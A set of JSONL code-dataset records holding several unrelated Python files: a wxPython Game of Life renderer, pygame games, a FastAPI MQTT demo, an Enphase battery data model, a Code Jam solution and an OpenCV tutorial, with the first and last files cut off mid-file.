y_pred_train_rf))\n\nprint(metrics.confusion_matrix(y_test, y_pred_rf))\n\nprint(metrics.classification_report(y_test, y_pred_rf, digits=5))","repo_name":"KaylaX/kaggle_for_fun","sub_path":"conversion_modeling.py","file_name":"conversion_modeling.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33680474772","text":"import wx\nfrom wx.lib import newevent\nfrom board import Board\nfrom engine import Engine\n\n\nevt_speed_changed, EVT_SPEED = newevent.NewEvent()\n\n\nclass WxRenderer(wx.App):\n def __init__(self):\n self._timer = None\n self._board = None\n self._engine = None\n self._gui = None\n 
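        # _speed below is the wx.Timer interval in milliseconds between engine
        # steps; it is updated at runtime by EVT_SPEED events posted from the
        # slider in MainFrame (see _update_speed).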
self._speed = 500\n super(WxRenderer, self).__init__(False)\n\n def OnInit(self):\n self._board = Board(30, 30)\n self._engine = Engine(self._board)\n self._gui = MainFrame(self._board)\n self._gui.Show()\n\n self._timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self._iterate, self._timer)\n self.Bind(EVT_SPEED, self._update_speed)\n\n self._init_game_board()\n\n self._timer.Start(self._speed)\n\n return True\n\n def _iterate(self, evt):\n self._engine.step()\n self._gui.Refresh()\n self._timer.Start(self._speed)\n\n def _init_game_board(self):\n #glider\n self._board.get(6, 6).alive = True\n self._board.get(7, 7).alive = True\n self._board.get(7, 8).alive = True\n self._board.get(6, 8).alive = True\n self._board.get(5, 8).alive = True\n\n #blinker\n self._board.get(12, 4).alive = True\n self._board.get(12, 5).alive = True\n self._board.get(12, 6).alive = True\n\n def _update_speed(self, evt):\n self._speed = evt.new_speed\n\n\nclass MainFrame(wx.Frame):\n def __init__(self, board):\n super(MainFrame, self).__init__(None)\n\n panel = GridCtrl(self, board, show_lines=False)\n self.speed_slider = wx.Slider(self, minValue=100, maxValue=1500)\n self.speed_value = wx.StaticText(self, label=\"NA\")\n\n sizer_speed = wx.BoxSizer(wx.HORIZONTAL)\n sizer_speed.Add(self.speed_slider, 1, wx.EXPAND)\n sizer_speed.Add(self.speed_value, 0, wx.EXPAND)\n sizer_main = wx.BoxSizer(wx.VERTICAL)\n sizer_main.Add(sizer_speed, 0, wx.EXPAND)\n sizer_main.Add(panel, 1, wx.EXPAND)\n\n self.SetSizer(sizer_main)\n\n self.Bind(wx.EVT_SLIDER, self._on_slider_changed, self.speed_slider)\n\n self.SetSize((500, 500))\n\n self.speed_slider.SetValue(100)\n self._on_slider_changed(None)\n\n def _on_slider_changed(self, evt):\n new_value = self.speed_slider.GetValue()\n self.speed_value.SetLabel(str(new_value))\n wx.PostEvent(self, evt_speed_changed(new_speed=new_value))\n\n\nclass Cell(object):\n def __init__(self, x, y, color=None):\n if color is None:\n color = wx.Colour(0, 0, 0)\n\n self.color = color\n self.x = x\n self.y = y\n\n\nclass GridCtrl(wx.Panel):\n def __init__(self, parent, board, show_lines=True):\n super(GridCtrl, self).__init__(parent)\n\n self._board = board\n self._width = board.width\n self._height = board.height\n self._show_lines = show_lines\n self._canvas_w = 0\n self._canvas_h = 0\n self._cell_width = 0\n self._cell_height = 0\n\n self._cell_brush = wx.Brush(\"grey\", wx.SOLID)\n\n self._cells = []\n\n self._cells.append(Cell(3, 2))\n\n self.Bind(wx.EVT_PAINT, self._on_paint)\n\n def _on_paint(self, evt):\n dc = wx.PaintDC(self)\n dc.Clear()\n self._canvas_w, self._canvas_h = self.GetSize()\n self._cell_width = self._canvas_w / self._width\n self._cell_height = self._canvas_h / self._height\n\n if self._show_lines:\n self._draw_grid_lines(dc)\n\n self._draw_cells(dc)\n\n def _draw_grid_lines(self, dc):\n dc.DrawLine(0, 0, self._canvas_w, 0)\n dc.DrawLine(0, 0, 0, self._canvas_h)\n dc.DrawLine(self._canvas_w, 0, self._canvas_w, self._canvas_h)\n dc.DrawLine(0, self._canvas_h, self._canvas_w, self._canvas_h)\n\n for y in range(0, self._height):\n dc.DrawLine(0, y * self._cell_height, self._canvas_w, y * self._cell_height)\n\n for x in range(0, self._width):\n dc.DrawLine(x * self._cell_width, 0, x * self._cell_width, self._canvas_w)\n\n def _draw_cells(self, dc):\n dc.SetBrush(self._cell_brush)\n for cell in self._board:\n if cell.is_alive:\n self._draw_cell(cell, dc)\n\n def _draw_cell(self, cell, dc):\n dc.DrawRectangle(cell.pos.x * self._cell_width,\n cell.pos.y * self._cell_height,\n 
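                         # the +1 padding below presumably lets neighboring
                         # cells overlap by one pixel so float-to-int rounding
                         # cannot leave hairline gaps in the grid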
self._cell_width + 1,\n self._cell_height + 1)\n\n\nif __name__ == \"__main__\":\n app = WxRenderer()\n app.MainLoop()\n","repo_name":"menacingChicken/game_of_life","sub_path":"gol/wx_renderer.py","file_name":"wx_renderer.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71529693634","text":"# Class\n\nimport pygame\nfrom pygame.locals import *\nfrom constantesM import *\nimport random\n\n\n# This class create the level\nclass Level:\n def __init__(self, file):\n self.file = file\n # Very important /!\\ THE ARRAY MUST BE EMPTY /!\\\n self.structure = []\n\n # Method that generate the level from the levelGame.txt\n def gen(self):\n # Open the file\n with open(self.file, \"r\") as file:\n structure_level = []\n # Reading the lines in file\n for line in file:\n line_of_level = []\n # Reading every letters in file\n for sprite in line:\n # Ignoring the last sprite to continue with the next line\n if sprite != '\\n':\n # Adding every letters to the array\n line_of_level.append(sprite)\n # Adding every lines the the array\n structure_level.append(line_of_level)\n # Then the method save the entire structure of the level\n self.structure = structure_level\n\n # This method display the level into the window\n def Show(self, Window):\n\n # Load the img of the structure of the level\n Wall = pygame.image.load(\"images/mur.png\").convert()\n Escape = pygame.image.load(garde).convert_alpha()\n\n # Read the entire structure\n num_ligne = 0\n for line in self.structure:\n # Read every line\n num_case = 0\n for sprite in line:\n # Calculate the real position of the sprite\n x = num_case * w_sprite\n y = num_ligne * w_sprite\n if sprite == 'm': # m = Wall\n Window.blit(Wall, (x, y))\n elif sprite == \"a\": # a = Exit of the maze\n Window.blit(Escape, (x, y))\n num_case += 1\n num_ligne += 1\n\n\n# That class create the character\nclass MacGyver:\n\n def __init__(self, right, left, up, down, level):\n\n # Sprites of the character (need to get improve)\n self.right = pygame.image.load(right).convert_alpha()\n self.left = pygame.image.load(left).convert_alpha()\n self.up = pygame.image.load(up).convert_alpha()\n self.down = pygame.image.load(down).convert_alpha()\n\n # Initial position of the character\n self.case_x = 0\n self.case_y = 0\n self.x = 0\n self.y = 0\n\n # Initial position of Mac Gyver. 
Need to be improve with the sprite\n self.direction = self.right\n self.level = level\n\n # This method allow the player to move Mac Gyver\n def move(self, direction):\n\n # Move to the right\n if direction == 'right':\n # To not get out of the window\n if self.case_x < (nsc - 1):\n # Check if the next iteration isn't a wall\n if self.level.structure[self.case_y][self.case_x + 1] != 'm':\n # Move 1 square\n self.case_x += 1\n # Calculate the real position\n self.x = self.case_x * w_sprite\n # Display the right sprite in fonction of movement\n self.direction = self.right\n\n # Move to the left\n if direction == 'left':\n if self.case_x > 0:\n if self.level.structure[self.case_y][self.case_x - 1] != 'm':\n self.case_x -= 1\n self.x = self.case_x * w_sprite\n self.direction = self.left\n\n # Move to the top\n if direction == 'up':\n if self.case_y > 0:\n if self.level.structure[self.case_y - 1][self.case_x] != 'm':\n self.case_y -= 1\n self.y = self.case_y * w_sprite\n self.direction = self.up\n\n # Move to the bottom\n if direction == 'down':\n if self.case_y < (nsc - 1):\n if self.level.structure[self.case_y + 1][self.case_x] != 'm':\n self.case_y += 1\n self.y = self.case_y * w_sprite\n self.direction = self.down\n\n\n# Class to create one of the items\nclass Ether:\n\n def __init__(self, obj, level):\n\n # Load the sprite of the item\n self.obj = pygame.image.load(obj).convert_alpha\n\n # Initial settings for the item\n self.level = level\n self.case_x, self.case_y = self.randpos()\n self.x = self.case_x * w_sprite\n self.y = self.case_y * w_sprite\n\n # Method that calculate a random pos to pop the item\n def randpos(self):\n count_max = 1\n count = 0\n\n # A loop to check of the position picked by random is a freespace\n while count < count_max:\n self.case_x = random.randint(0, 14)\n self.case_y = random.randint(0, 14)\n\n # If the sprite is a freespace\n if self.level.structure[self.case_y][self.case_x] == '0':\n\n # then change it to a mark where the program gonna pop the item.\n self.level.structure[self.case_y][self.case_x] = \"o1\"\n\n # And quit the loop\n count += 1\n break\n return self.case_x, self.case_y\n\n # Method that display the item on the map\n def display(self, Window):\n\n # Load the sprite\n c_ether = pygame.image.load(\"images/ether.png\").convert_alpha()\n\n # Display the item on screen\n Window.blit(c_ether, (self.x, self.y))\n\n\n# Class to create one of the items\nclass Needle:\n def __init__(self, obj, level):\n self.obj = pygame.image.load(obj).convert_alpha\n self.level = level\n self.case_x, self.case_y = self.randpos()\n self.x = self.case_x * w_sprite\n self.y = self.case_y * w_sprite\n\n def randpos(self):\n count_max = 1\n count = 0\n while count < count_max:\n self.case_x = random.randint(0,14)\n self.case_y = random.randint(0,14)\n if self.level.structure[self.case_y][self.case_x] == '0':\n self.level.structure[self.case_y][self.case_x] = \"o2\"\n count += 1\n break\n return self.case_x, self.case_y\n\n def display(self, Window):\n c_needle = pygame.image.load(\"images/needle.png\").convert_alpha()\n Window.blit(c_needle, (self.x, self.y))\n\n\n# Class to create one of the items\nclass Tube:\n def __init__(self, obj, level):\n self.obj = pygame.image.load(obj).convert_alpha\n self.level = level\n self.case_x, self.case_y = self.randpos()\n self.x = self.case_x * w_sprite\n self.y = self.case_y * w_sprite\n\n def randpos(self):\n count_max = 1\n count = 0\n while count < count_max:\n self.case_x = random.randint(0,14)\n self.case_y = 
random.randint(0,14)\n if self.level.structure[self.case_y][self.case_x] == '0':\n self.level.structure[self.case_y][self.case_x] = \"o3\"\n count += 1\n break\n return self.case_x, self.case_y\n\n def display(self, Window):\n c_tube = pygame.image.load(\"images/tube.png\").convert_alpha()\n Window.blit(c_tube, (self.x, self.y))\n","repo_name":"Nexus-Strife/MacGyver","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":7245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6532932969","text":"import os\n\nfrom fastapi import FastAPI\nfrom fastapi_mqtt import FastMQTT, MQTTConfig\nimport uvicorn\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom log_config import get_logger\n\nlogger = get_logger()\n\nMQTT_HOST = os.getenv(\"MQTT_HOST\", \"localhost\")\nMQTT_PORT = int(os.getenv(\"MQTT_PORT\", 1883))\nlogger.info(f\"MQTT_HOST: {MQTT_HOST}\")\nlogger.info(f\"MQTT_PORT: {MQTT_PORT}\")\n\nMQTT_GROUP = os.getenv(\"MQTT_GROUP\", \"group1\")\nMQTT_TOPIC = os.getenv(\"MQTT_TOPIC\", \"test\")\nSUBSCRIBE_TOPIC = f\"$share/{MQTT_GROUP}/{MQTT_TOPIC}\"\nlogger.info(f\"MQTT_GROUP: {MQTT_GROUP}, MQTT_TOPIC: {MQTT_TOPIC}\")\nlogger.info(f\"SUBSCRIBE_TOPIC: {SUBSCRIBE_TOPIC}\")\n\n# MQTT config\nmqtt_config = MQTTConfig(\n host=MQTT_HOST,\n port=MQTT_PORT\n)\n\nmqtt = FastMQTT(\n config=mqtt_config\n)\n\napp = FastAPI()\nmqtt.init_app(app)\n\n\ndef tick():\n logger.info(\"tick\")\n mqtt.publish(MQTT_TOPIC, 'tick')\n\n\n@app.on_event('startup')\nasync def init_data():\n logger.info(\"Starting the scheduler\")\n scheduler = BackgroundScheduler()\n scheduler.add_job(tick, 'interval', seconds=10)\n scheduler.start()\n\n\n@mqtt.on_connect()\ndef connect(client, flags, rc, properties):\n logger.info(\"Connected to MQTT Broker!\")\n mqtt.client.subscribe(SUBSCRIBE_TOPIC) # subscribing mqtt topic\n logger.info(f\"Connected: {client}, {flags}, {rc}, {properties}\")\n\n\n@mqtt.on_message()\nasync def message(client, topic, payload, qos, properties):\n logger.info(f\"Received message ({os.getpid()}): {topic}, {payload.decode()}, {qos}, {properties}\")\n\n\n@mqtt.subscribe(\"dupa\")\nasync def message_to_topic(client, topic, payload, qos, properties):\n logger.info(\"Received message to specific topic: \", topic, payload.decode(), qos, properties)\n\n\n@mqtt.on_disconnect()\ndef disconnect(client, packet, exc=None):\n logger.info(\"Disconnected\")\n\n\n@mqtt.on_subscribe()\ndef subscribe(client, mid, qos, properties):\n logger.info(f\"subscribed {client}, {mid}, {qos}, {properties}\")\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/publish\")\nasync def func(message: str = \"Test message.\"):\n logger.info(f\"Publishing message ({os.getpid()}): {message}\")\n mqtt.publish(MQTT_TOPIC, message)\n\n return {\"result\": True, \"message\": \"Published\"}\n\n\nif __name__ == \"__main__\":\n logger.info(\"Starting server from main.py\")\n port = int(os.getenv(\"PORT\", 8080))\n uvicorn.run(app, host='0.0.0.0', port=port)\n","repo_name":"karol-brejna-i/mqtt-shared-subscription","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23562994781","text":"\n# coding: utf-8\n\n# In[37]:\n\ndef isTidy(N):\n if(N < 9):\n return True\n #get unit and tenth place\n unitPlace = N % 10\n tenthPlace = (N // 10) % 10\n if(tenthPlace > 
unitPlace):\n return False\n else:\n return isTidy(N // 10)\n \ndef tidyNumber(N):\n n = N\n while n >= 0:\n if isTidy(n):\n return n\n n = n -1\n\nf = open('./data/B-small-attempt1.in')\nfOut = open('./data/B-small-attempt1.out',\"w+\")\nt = f.readline()\nprint(t)\nt = int(t)\nfor i in range(t + 1):\n num = f.readline()\n try:\n num = int(num)\n fOut.write('Case #' + str((i + 1)) + \":\" + str(tidyNumber(num)) + \"\\n\")\n except:\n pass\nf.close()\nfOut.close()\n\n\n# In[ ]:\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4911.py","file_name":"4911.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1218950882","text":"\"\"\"Model for the Encharge/IQ Battery.\"\"\"\n# Data Source: URL_ENSEMBLE_INVENTORY (primary) & URL_ENCHARGE_BATTERY\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Any\n\n\n@dataclass(slots=True)\nclass EnvoyEnchargeAggregate:\n \"\"\"Model for Encharge aggregate data.\"\"\"\n\n available_energy: int\n backup_reserve: int\n state_of_charge: int\n reserve_state_of_charge: int\n configured_reserve_state_of_charge: int\n max_available_capacity: int\n\n @classmethod\n def from_api(cls, data: dict[str, Any]) -> EnvoyEnchargeAggregate:\n \"\"\"Initialize from the API.\"\"\"\n return cls(\n available_energy=data[\"ENC_agg_avail_energy\"],\n backup_reserve=data[\"ENC_agg_backup_energy\"],\n state_of_charge=data[\"ENC_agg_soc\"],\n reserve_state_of_charge=data[\"adjusted_backup_soc\"],\n configured_reserve_state_of_charge=data[\"configured_backup_soc\"],\n max_available_capacity=data[\"Enc_max_available_capacity\"],\n )\n\n\n@dataclass(slots=True)\nclass EnvoyEnchargePower:\n \"\"\"Model for the Encharge/IQ battery power.\"\"\"\n\n apparent_power_mva: int\n real_power_mw: int\n soc: int\n\n @classmethod\n def from_api(cls, power: dict[str, Any]) -> EnvoyEnchargePower:\n \"\"\"Initialize from the API.\"\"\"\n return cls(\n apparent_power_mva=power[\"apparent_power_mva\"],\n real_power_mw=power[\"real_power_mw\"],\n soc=power[\"soc\"],\n )\n\n\n@dataclass(slots=True)\nclass EnvoyEncharge:\n \"\"\"Model for the Encharge/IQ battery.\"\"\"\n\n admin_state: int\n admin_state_str: str\n bmu_firmware_version: str\n comm_level_2_4_ghz: int\n comm_level_sub_ghz: int\n communicating: bool\n dc_switch_off: bool\n encharge_capacity: int\n encharge_revision: int\n firmware_loaded_date: int\n firmware_version: str\n installed_date: int\n last_report_date: int\n led_status: int\n max_cell_temp: int\n operating: bool | None\n part_number: str\n percent_full: int\n serial_number: str\n temperature: int\n temperature_unit: str\n zigbee_dongle_fw_version: str | None\n\n @classmethod\n def from_api(cls, inventory: dict[str, Any]) -> EnvoyEncharge:\n \"\"\"Initialize from the API.\"\"\"\n return cls(\n admin_state=inventory[\"admin_state\"],\n admin_state_str=inventory[\"admin_state_str\"],\n bmu_firmware_version=inventory[\"bmu_fw_version\"],\n comm_level_2_4_ghz=inventory[\"comm_level_2_4_ghz\"],\n comm_level_sub_ghz=inventory[\"comm_level_sub_ghz\"],\n communicating=inventory[\"communicating\"],\n dc_switch_off=inventory[\"dc_switch_off\"],\n encharge_capacity=inventory[\"encharge_capacity\"],\n encharge_revision=inventory[\"encharge_rev\"],\n firmware_loaded_date=inventory[\"img_load_date\"],\n firmware_version=inventory[\"img_pnum_running\"],\n installed_date=inventory[\"installed\"],\n 
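            # (note) installed above and last_rpt_date below look like raw
            # epoch timestamps from the Envoy payload; they are passed through
            # unconverted.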
last_report_date=inventory[\"last_rpt_date\"],\n            led_status=inventory[\"led_status\"],\n            max_cell_temp=inventory[\"maxCellTemp\"],\n            operating=inventory.get(\"operating\"), # Firmware 8+ does not have this key\n            part_number=inventory[\"part_num\"],\n            percent_full=inventory[\"percentFull\"],\n            serial_number=inventory[\"serial_num\"],\n            temperature=inventory[\"temperature\"],\n            temperature_unit=\"C\",\n            zigbee_dongle_fw_version=inventory.get(\n                \"zigbee_dongle_fw_version\"\n            ), # Firmware 8+ does not have this key\n        )\n","repo_name":"pyenphase/pyenphase","sub_path":"src/pyenphase/models/encharge.py","file_name":"encharge.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"38971053855","text":"import cv2\nimport numpy as np\n\n\n\n\n#######################################################################################################################\n#INTRODUCTION TO OpenCV\n#######################################################################################################################\n\n# Read image\nimage = cv2.imread(\"./images/lena.jpeg\")\n\n# Image properties\nprint(\"Type of image: \",type(image))\nprint(\"Data type of image: \",image.dtype) # why uint8 ?-> https://docs.opencv.org/2.4/modules/highgui/doc/user_interface.html#imshow\n\n\nprint(image.shape)\nprint(image.shape[0]) # height\nprint(image.shape[1]) # width\nprint(image.shape[2]) # number of channels\n\n\n# Reach the pixel vectors (cv2.split and direct channel indexing are equivalent)\nb,g,r = cv2.split(image)\n\nb = image[:,:,0]\ng = image[:,:,1]\nr = image[:,:,2]\n\n\n'''\nGrayscale is a special case because a gray image is stored in only two dimensions. The function to load images, \n'cv2.imread()', loads 3 channels (BGR) by default, but nothing extra is needed while loading gray images. 
Additionally, \nit is possible to convert a loaded color image to gray, and conversions to other color spaces, not just gray, are possible too.\n'''\n\n# Conversion to grayscale\nprint(\"Original image shape: \",image.shape)\ngray_image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\nprint(\"Grayscale image shape: \",gray_image.shape)\ngray_image = cv2.imread(\"./images/rgb_image.jpeg\",cv2.IMREAD_GRAYSCALE)\n\n\n# Image Visualization\ncv2.imshow(\"blue channel\",b)\ncv2.imshow(\"image\",image)\ncv2.imshow(\"gray image\",gray_image)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# MANIPULATING PIXEL VALUES (Accessing and changing pixels of an image)\n#######################################################################################################################\n\n# Let's create a picture ourselves\nimg = np.zeros(shape=(500,500,3),dtype=np.uint8)\n\ncv2.imshow(\"img\",img)\ncv2.waitKey(0)\n\n# Change the color of individual pixels\nimg[50,50] = (255,0,0) # pure blue (channels are in BGR order)\nimg[450,250] = (255,255,255)\n\ncv2.imshow(\"img\",img)\ncv2.waitKey(0)\n\nimg_grayscale = np.full(shape=(500,500),fill_value=255,dtype=np.uint8)\nimg_grayscale[50,50] = 0\n\n\ncv2.imshow(\"Grayscale\",img_grayscale)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# READING VIDEO WITH OpenCV\n#######################################################################################################################\n\ncap = cv2.VideoCapture(\"./images/spot.mp4\")\n\nwhile True:\n    ret,frame = cap.read()\n    if not ret: # stop when the stream ends or a frame cannot be read\n        break\n\n    # frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) # if you want to make it gray\n\n    cv2.imshow(\"video\",frame)\n    key = cv2.waitKey(30)\n    if key == ord('q'):\n        break\n\ncap.release() # release the capture so it no longer holds the file/device\ncv2.destroyAllWindows() # close the open windows\n\n\n\n\n#######################################################################################################################\n# Resizing the image\n#######################################################################################################################\n\n\"\"\"\nTypes of interpolation in OpenCV:\n\n- INTER_NEAREST - a nearest-neighbor interpolation\n- INTER_LINEAR - a bilinear interpolation (used by default)\n- INTER_AREA - Resampling using pixel area relation. It may be a preferred method for image decimation. \n                But when the image is zoomed, it is similar to the INTER_NEAREST method. \n- INTER_CUBIC - a bicubic interpolation over 4x4 pixel neighborhood\n- INTER_LANCZOS4 - a Lanczos interpolation over 8x8 pixel neighborhood\n\n\"\"\"\n\nimg = cv2.imread(\"./images/lena.jpeg\")\nprint(\"Original image shape: \",img.shape)\n\nnew_img = cv2.resize(img,dsize=(200,200),interpolation=cv2.INTER_LINEAR) # interpolation\nprint(\"Shape after resizing: \",new_img.shape)\n\n'''\nAttention here
, the first value of img.shape gives the height of the image \nbut the first value written in resize() is the width in the new resize.\n'''\n\ncv2.imshow(\"Img\",img)\ncv2.imshow(\"New img\",new_img)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# ADDING DIFFERENT SHAPES AND TEXTS TO THE PICTURE\n#######################################################################################################################\n\nblank = np.zeros((500,500,3),dtype=np.uint8)\ncv2.imshow('Blank',blank)\n\n# point image a certain color\nblank[0:100,0:100] = 0,255,0 # Paint an area 100x100\n\n# draw rectangle\ncv2.rectangle(blank,(50,50),(100,100),(0,0,255),1) # trt with thickness=-1\n\n# draw circle\ncv2.circle(blank,(255,250),50,(0,0,255),1)\n\n# draw line\ncv2.line(blank,(0,0),(300,300),(0,0,255),2)\n\n# put text\ncv2.putText(blank,'ESTU',(70,70),cv2.FONT_HERSHEY_PLAIN,1,(0,0,255),1)\n\n\ncv2.imshow(\"Green\",blank)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# THRESHOLD\n#######################################################################################################################\n\n'It is the process of dyeing values higher or lower than a specified threshold value into different colors.'\n\n\n'Check here for more information.'\n# https://docs.opencv.org/3.4/db/d8e/tutorial_threshold.html\n\n\nimg = cv2.imread(\"./images/coins.jpg\")\ncv2.imshow(\"img\",img)\n\n#It is useful to make the picture gray before applying.\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"gray\",gray)\n\n\n# simple thresholding\nthreshold,thresh = cv2.threshold(gray,150,255,cv2.THRESH_BINARY)\nthreshold,thresh_inv = cv2.threshold(gray,150,255,cv2.THRESH_BINARY_INV)\n\ncv2.imshow(\"thresh invert\",thresh_inv)\ncv2.imshow(\"thresh\",thresh)\ncv2.waitKey(0)\n\n\n\n\n#######################################################################################################################\n# Why we use hsv color space?\n#######################################################################################################################\n\nimg = cv2.imread(\"./images/red_car.jpg\")\nhsv_img = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\nlower1 = np.array([161, 155, 84])\nupper1 = np.array([179, 255, 255])\n\nlower2 = np.array([0,50,50])\nupper2 = np.array([10,255,255])\n\nred_mask1 = cv2.inRange(hsv_img, lower1, upper1)\nred_mask2 = cv2.inRange(hsv_img,lower2,upper2)\n\nred_mask = red_mask1 + red_mask2\nred = cv2.bitwise_and(img, img, mask=red_mask)\n\ncv2.imshow(\"red_mask\",red_mask)\ncv2.imshow(\"red\",red)\ncv2.imshow(\"bgr\",img)\ncv2.imshow(\"hsv\",hsv_img)\ncv2.waitKey(0)\n","repo_name":"mazlumdc/OpenCV","sub_path":"OpenCV/OpenCV.py","file_name":"OpenCV.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23790746259","text":"import pygame\nfrom pygame import time as pytime\nfrom pygame.locals import *\nimport time\nimport sys\n\nscreen_w = 640\nscreen_h = 480\n\ndef main():\n pygame.mixer.init()\n pygame.mixer.music.load(\"melty_blood_song.mp3\")\n pygame.mixer.music.play(-1)\n\n pygame.init()# este comando inicia la aplicacion \n screen = pygame.display.set_mode((screen_w, screen_h),FULLSCREEN) # comando para desplegar fondo\n pygame.display.set_caption(\"Melty Blood 2.0\") # comando para desplegar mensaje en la 
ventana\n \n fondo = pygame.image.load(\"stage.jpg\").convert()\n x = 80\n y = 20\n i = 8\n v = 0 # frames animacion\n u = 0 # frames agacharse, saltar, golpear\n time = 100 # stand by\n time_2 = 70 # movimiento\n time_3 = 35 # agacharse\n time_4 = 0 # espera de agacharse\n estado = 0\n pos = 0\n final_1 = 85\n final_2 = 10\n \n Akiha_00 = {} # stand by derecha \n Akiha_00[0]=(\"aki00_000.png\")\n Akiha_00[1]=(\"aki00_001.png\")\n Akiha_00[2]=(\"aki00_002.png\")\n Akiha_00[3]=(\"aki00_003.png\")\n Akiha_00[4]=(\"aki00_004.png\")\n Akiha_00[5]=(\"aki00_005.png\")\n Akiha_00[6]=(\"aki00_006.png\")\n Akiha_00[7]=(\"aki00_007.png\")\n Akiha_00[8]=(\"aki00_008.png\")\n Akiha_00[9]=(\"aki00_009.png\")\n Akiha_00[10]=(\"aki00_010.png\")\n Akiha_00[11]=(\"aki00_011.png\")\n\n Akihar_00 = {} # stand by izquierda\n Akihar_00[0]=(\"aki00r_000.png\")\n Akihar_00[1]=(\"aki00r_001.png\")\n Akihar_00[2]=(\"aki00r_002.png\")\n Akihar_00[3]=(\"aki00r_003.png\")\n Akihar_00[4]=(\"aki00r_004.png\")\n Akihar_00[5]=(\"aki00r_005.png\")\n Akihar_00[6]=(\"aki00r_006.png\")\n Akihar_00[7]=(\"aki00r_007.png\")\n Akihar_00[8]=(\"aki00r_008.png\")\n Akihar_00[9]=(\"aki00r_009.png\")\n Akihar_00[10]=(\"aki00r_010.png\")\n Akihar_00[11]=(\"aki00r_011.png\")\n \n Akiha_01 = {} # animacion caminar derecha\n Akiha_01[0]=(\"aki26_000.png\")\n Akiha_01[1]=(\"aki26_001.png\")\n Akiha_01[2]=(\"aki26_002.png\")\n Akiha_01[3]=(\"aki26_003.png\")\n Akiha_01[4]=(\"aki26_004.png\")\n Akiha_01[5]=(\"aki26_005.png\")\n Akiha_01[6]=(\"aki26_006.png\")\n Akiha_01[7]=(\"aki26_007.png\")\n Akiha_01[8]=(\"aki26_008.png\")\n Akiha_01[9]=(\"aki26_009.png\")\n Akiha_01[10]=(\"aki26_010.png\")\n Akiha_01[11]=(\"aki26_010.png\")\n Akiha_01[12]=(\"aki26_011.png\")\n Akiha_01[13]=(\"aki26_012.png\")\n\n Akihar_01 = {} # animacion caminar izquierda\n Akihar_01[0]=(\"aki26r_000.png\")\n Akihar_01[1]=(\"aki26r_001.png\")\n Akihar_01[2]=(\"aki26r_002.png\")\n Akihar_01[3]=(\"aki26r_003.png\")\n Akihar_01[4]=(\"aki26r_004.png\")\n Akihar_01[5]=(\"aki26r_005.png\")\n Akihar_01[6]=(\"aki26r_006.png\")\n Akihar_01[7]=(\"aki26r_007.png\")\n Akihar_01[8]=(\"aki26r_008.png\")\n Akihar_01[9]=(\"aki26r_009.png\")\n Akihar_01[10]=(\"aki26r_010.png\")\n Akihar_01[11]=(\"aki26r_010.png\")\n Akihar_01[12]=(\"aki26r_011.png\")\n Akihar_01[13]=(\"aki26r_012.png\")\n\n Akiha_02 = {} # animacion abajo derecha\n Akiha_02[0]=(\"aki28_000.png\")\n Akiha_02[1]=(\"aki28_001.png\")\n Akiha_02[2]=(\"aki28_002.png\")\n Akiha_02[3]=(\"aki28_003.png\")\n Akiha_02[4]=(\"aki28_004.png\")\n Akiha_02[5]=(\"aki28_005.png\")\n Akiha_02[6]=(\"aki28_006.png\")\n Akiha_02[7]=(\"aki28_007.png\")\n Akiha_02[8]=(\"aki28_008.png\")\n Akiha_02[9]=(\"aki28_009.png\")\n Akiha_02[10]=(\"aki28_010.png\")\n Akiha_02[11]=(\"aki28_011.png\")\n Akiha_02[12]=(\"aki28_012.png\")\n Akiha_02[13]=(\"aki28_013.png\")\n\n Akihar_02 = {} # animacion abajo derecha\n Akihar_02[0]=(\"aki28r_000.png\")\n Akihar_02[1]=(\"aki28r_001.png\")\n Akihar_02[2]=(\"aki28r_002.png\")\n Akihar_02[3]=(\"aki28r_003.png\")\n Akihar_02[4]=(\"aki28r_004.png\")\n Akihar_02[5]=(\"aki28r_005.png\")\n Akihar_02[6]=(\"aki28r_006.png\")\n Akihar_02[7]=(\"aki28r_007.png\")\n Akihar_02[8]=(\"aki28r_008.png\")\n Akihar_02[9]=(\"aki28r_009.png\")\n Akihar_02[10]=(\"aki28r_010.png\")\n Akihar_02[11]=(\"aki28r_011.png\")\n Akihar_02[12]=(\"aki28r_012.png\")\n Akihar_02[13]=(\"aki28r_013.png\")\n\n Akiha_03 = {} # animacion hacia arriba derecha\n Akiha_03[0]=(\"aki17_000.png\")\n Akiha_03[1]=(\"aki17_001.png\")\n 
